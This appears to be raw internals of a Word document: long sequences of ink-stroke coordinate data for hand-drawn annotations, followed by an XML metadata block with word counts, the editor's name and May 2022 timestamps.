0,-132-11 0,16-2 0,124 4 0,-124 11 0,-83 3 0,0-2 0,0 0 0,0-2 0,44-8 0,-42 2 0,43-21 0,0-1 0,-61 27 0,0 0 0,-1 0 0,1-1 0,-1 0 0,0-1 0,0 0 0,0 0 0,0 0 0,-1-1 0,0 0 0,0 0 0,-1 0 0,8-12 0,-10 12 0,0 0 0,0 1 0,-1-1 0,0 0 0,0-1 0,0 1 0,-1 0 0,0 0 0,0-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,0-1 0,0 1 0,-1 0 0,-3-11 0,2 12 0,1-1 0,-1 1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-8-4 0,-72-36 0,19 10 0,41 20 0,1 1 0,-1 2 0,-1 0 0,0 2 0,-1 0 0,0 2 0,0 1 0,0 1 0,-1 1 0,-26 0 0,6 1 0,-166-8 0,77 10 0,-119 2 0,128 15 0,87-10 0,-75 4 0,-59 5 0,159-15 0,-57-1 0,-121 14 0,159-10 0,-52-1 0,55-2 0,0 1 0,-38 6 0,15-1 0,-1-2 0,-93-6 0,45 0 0,52 2 0,-293-12 0,227 7 0,79 5 0,-67-8 0,41 1 0,0 3 0,-95 6 0,41 1 0,-471-3 0,418-16 0,-289 16-1365,442 0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22:58:37.0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05 89 24575,'0'-2'0,"-1"1"0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-2 0 0,-51-2 0,43 2 0,-72-1 0,45 3 0,-1-3 0,1-1 0,-59-12 0,74 10 0,1 1 0,-1 1 0,-24 2 0,22 0 0,-1-2 0,-32-5 0,-9-5 0,-1 2 0,-117-1 0,-123 22 0,14 0 0,-37 0 0,221-12 0,-118 3 0,-4 9 0,226-11 0,-8-1 0,1 0 0,0 1 0,0 1 0,0 1 0,0-1 0,0 2 0,0 0 0,0 1 0,1 0 0,-21 10 0,-11 9 0,27-15 0,1 0 0,0 2 0,0 0 0,-22 19 0,33-24 0,0 0 0,1 0 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,0 0 0,0 0 0,1 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,0 11 0,2 9 0,0 0 0,2 0 0,0-1 0,2 1 0,1-1 0,13 34 0,-14-44 0,0 0 0,2-1 0,0 0 0,0 0 0,2 0 0,0-1 0,0 0 0,20 20 0,-21-26 0,0 0 0,1-1 0,0 0 0,0-1 0,0 0 0,1 0 0,0-1 0,1 0 0,-1-1 0,1 0 0,0-1 0,-1 0 0,21 3 0,107 5 0,190-9 0,-154-5 0,181-21 0,-292 17 0,265 2 0,-177 8 0,628 8 0,-69-11 0,-673-1 0,48-10 0,10 0 0,217 1 0,-205 11 0,116-2 0,52-10 0,-95 10 0,177 2 0,-147 21 0,-193-19 0,18 3 0,61 21 0,16 2 0,-57-18 0,-12-3 0,66 6 0,-68-12 0,1-1 0,43-6 0,-70 3 0,-1-1 0,1 0 0,-1-1 0,0-1 0,0 0 0,0-1 0,0 0 0,-1-1 0,14-10 0,-5 1 0,0 0 0,-1-2 0,-1 0 0,0-1 0,28-37 0,-40 45 0,0-1 0,-1 0 0,0-1 0,-1 0 0,0 0 0,-1 0 0,-1-1 0,0 0 0,0 1 0,-2-1 0,0-1 0,1-22 0,-3 36 0,-5-102 0,4 96 0,0-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,0 0 0,0 0 0,-1 0 0,0 1 0,-7-9 0,4 8 0,-1 0 0,-1 1 0,1 0 0,-1 0 0,0 1 0,0 1 0,0-1 0,-1 1 0,-17-4 0,-12-3 0,-42-4 0,74 14 0,-187-17 0,30 4 0,82 7 0,-140 7 0,94 2 0,-43 0 0,-181-4 0,-73-31 0,27 11 0,-39 11 0,333 13 0,-108-4 0,191 1 0,-207-9 0,-148 10-1365,367 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3T23:08:46.6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31 128 24575,'-43'0'0,"0"-2"0,1-2 0,0-1 0,-75-20 0,77 12 0,-1 3 0,1 1 0,-2 2 0,-68-3 0,-117-3 0,-1555 13 0,1767-1 0,0 0 0,1-1 0,-26-8 0,25 6 0,0 0 0,0 2 0,-23-3 0,-628 5 0,312 1 0,333 1 0,-1 0 0,1 2 0,-1 0 0,-24 9 0,-34 7 0,42-9 0,0 1 0,0 1 0,2 3 0,-1 1 0,-41 26 0,72-39 0,0 0 0,-1 0 0,1 1 0,0 0 0,0 0 0,1 0 0,0 1 0,-1 0 0,2 0 0,-1 0 0,1 1 0,0 0 0,0-1 0,1 1 0,-5 13 0,5-10 0,0 0 0,1-1 0,0 1 0,1 0 0,0 0 0,0 0 0,1 0 0,1 0 0,-1 0 0,2 0 0,1 10 0,2-10 0,1 0 0,-1-1 0,2 0 0,-1 0 0,1 0 0,1 0 0,-1-1 0,12 9 0,-12-11 0,-1-1 0,0 0 0,1-1 0,-1 0 0,1 0 0,0 0 0,0-1 0,1 0 0,-1-1 0,1 1 0,-1-2 0,1 1 0,11 0 0,15 1 0,50-2 0,-61-1 0,53-1 0,112 12 0,8 3 0,-134-8 0,0-3 0,66-6 0,-17 0 0,834 3 0,-763-14 0,1105 15 0,-1078 13 0,587-15 0,-789 0 0,1 0 0,-1-1 0,0 0 0,1 0 0,-1-1 0,0 0 0,0 0 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,-1-1 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,0-1 0,0 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,-1-1 0,0 1 0,-1 0 0,0-1 0,1-10 0,-3 15 0,0-1 0,0 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-2 0 0,1 1 0,0-1 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-4-2 0,-69-27 0,74 30 0,-128-32 0,80 21 0,-55-19 0,54 19 0,44 10 0,1 0 0,0 0 0,0 0 0,0-1 0,1 0 0,-1 0 0,0 0 0,0-1 0,1 0 0,0 0 0,0 0 0,-8-7 0,10 8-114,0 0 1,1 0-1,-1 0 0,0 0 0,0 1 1,0-1-1,0 1 0,-1 0 0,1-1 1,0 1-1,-6 0 0,-2-1-67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9</Pages>
  <Words>377</Words>
  <Characters>2151</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>17</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop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eadows</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Iris Carrell</cp:lastModifiedBy>
  <cp:revision>62</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-03T06:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-03T23:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>